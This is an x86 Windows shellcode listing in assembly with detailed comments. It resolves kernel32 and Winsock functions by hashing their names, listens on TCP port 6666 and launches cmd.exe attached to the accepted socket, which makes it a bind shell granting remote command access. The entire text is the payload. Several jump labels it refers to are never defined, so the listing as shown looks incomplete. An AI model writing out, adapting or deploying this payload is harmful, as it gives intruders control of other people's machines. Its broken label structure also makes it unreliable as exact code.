; start of shellcode
; assume: eax points here
; function hashes (executable as nop-equivalent)
_emit 0x59 ; LoadLibraryA ; pop ecx
_emit 0x81 ; CreateProcessA ; or ecx, 0x203062d3
_emit 0xc9 ; ExitProcess
_emit 0xd3 ; WSAStartup
_emit 0x62 ; WSASocketA
_emit 0x30 ; bind
_emit 0x20 ; listen
_emit 0x41 ; accept ; inc ecx
; "CMd"
_emit 0x43 ; inc ebx
_emit 0x4d ; dec ebp
_emit 0x64 ; FS:
call begin
pop eax
sub eax, 0x10
; start of proper code
cdq ; set edx = 0 (eax points to stack so is less than 0x80000000)
xchg eax, esi ; esi = addr of first function hash
lea edi, [esi - 0x18] ; edi = addr to start writing function
; addresses (last addr will be written just
; before "cmd")
; find base addr of kernel32.dll
mov ebx, fs:[edx + 0x30] ; ebx = address of PEB
mov ecx, [ebx + 0x0c] ; ecx = pointer to loader data
mov ecx, [ecx + 0x1c] ; ecx = first entry in initialisation order list
mov ecx, [ecx] ; ecx = second entry in list (kernel32.dll)
mov ebp, [ecx + 0x08] ; ebp = base address of kernel32.dll
; make some stack space
mov dh, 0x03 ; sizeof(WSADATA) is 0x190
sub esp, edx
; push a pointer to "ws2_32" onto stack
mov dx, 0x3233 ; rest of edx is null
push edx
push 0x5f327377
push esp
lodsb ; load next hash into al and increment esi
cmp al, 0xd3 ; hash of WSAStartup - trigger
; LoadLibrary("ws2_32")
jne find_functions
xchg eax, ebp ; save current hash
call [edi - 0xc] ; LoadLibraryA
xchg eax, ebp ; restore current hash, and update ebp
; with base address of ws2_32.dll
push edi ; save location of addr of first winsock function
pushad ; preserve registers
mov eax, [ebp + 0x3c] ; eax = start of PE header
mov ecx, [ebp + eax + 0x78] ; ecx = relative offset of export table
add ecx, ebp ; ecx = absolute addr of export table
mov ebx, [ecx + 0x20] ; ebx = relative offset of names table
add ebx, ebp ; ebx = absolute addr of names table
xor edi, edi ; edi will count through the functions
inc edi ; increment function counter
mov esi, [ebx + edi * 4] ; esi = relative offset of current function name
add esi, ebp ; esi = absolute addr of current function name
cdq ; dl will hold hash (we know eax is small)
lodsb ; load next char into al and increment esi
xor al, 0x71 ; XOR current char with 0x71
sub dl, al ; update hash with current char
cmp al, 0x71 ; loop until we reach end of string
jne hash_loop
cmp dl, [esp + 0x1c] ; compare to the requested hash (saved on stack from pushad)
jnz next_function_loop
; we now have the right function
mov ebx, [ecx + 0x24] ; ebx = relative offset of ordinals table
add ebx, ebp ; ebx = absolute addr of ordinals table
mov di, [ebx + 2 * edi] ; di = ordinal number of matched function
mov ebx, [ecx + 0x1c] ; ebx = relative offset of address table
add ebx, ebp ; ebx = absolute addr of address table
add ebp, [ebx + 4 * edi] ; add to ebp (base addr of module) the
; relative offset of matched function
xchg eax, ebp ; move func addr into eax
pop edi ; edi is last onto stack in pushad
stosd ; write function addr to [edi] and increment edi
push edi
popad ; restore registers
cmp esi, edi ; loop until we reach end of last hash
jne find_lib_functions
pop esi ; saved location of first winsock function
; we will lodsd and call each func in sequence
; initialize winsock
push esp ; use stack for WSADATA
push 0x02 ; wVersionRequested
call eax ; WSAStartup
; null-terminate "cmd"
mov byte ptr [esi + 0x13], al ; eax = 0 if WSAStartup() worked
; clear some stack to use as NULL parameters
lea ecx, [eax + 0x30] ; sizeof(STARTUPINFO) = 0x44,
mov edi, esp
rep stosd ; eax is still 0
; create socket
inc eax
push eax ; type = 1 (SOCK_STREAM)
inc eax
push eax ; af = 2 (AF_INET)
call eax ; WSASocketA
xchg ebp, eax ; save SOCKET descriptor in ebp (safe from
; being changed by remaining API calls)
; push bind parameters
mov eax, 0x0a1aff02 ; 0x1a0a = port 6666, 0x02 = AF_INET
xor ah, ah ; remove the ff from eax
push eax ; we use 0x0a1a0002 as both the name (struct
; sockaddr) and namelen (which only needs to
; be large enough)
push esp ; pointer to our sockaddr struct
; call bind(), listen() and accept() in turn
push ebp ; saved SOCKET descriptor (we implicitly pass
; NULL for all other params)
call eax ; call the next function
test eax, eax ; bind() and listen() return 0, accept()
; returns a SOCKET descriptor
jz call_loop
; initialise a STARTUPINFO structure at esp
inc byte ptr [esp + 0x2d] ; set STARTF_USESTDHANDLES to true
sub edi, 0x6c ; point edi at hStdInput in STARTUPINFO
stosd ; use SOCKET descriptor returned by accept
; (still in eax) as the stdin handle
stosd ; same for stdout
stosd ; same for stderr (optional)
; create process
pop eax ; set eax = 0 (STARTUPINFO now at esp + 4)
push esp ; use stack as PROCESSINFORMATION structure
; (STARTUPINFO now back to esp)
push esp ; STARTUPINFO structure
push eax ; lpCurrentDirectory = NULL
push eax ; lpEnvironment = NULL
push eax ; dwCreationFlags = NULL
push esp ; bInheritHandles = true
push eax ; lpThreadAttributes = NULL
push eax ; lpProcessAttributes = NULL
push esi ; lpCommandLine = "cmd"
push eax ; lpApplicationName = NULL
call [esi - 0x1c] ; CreateProcessA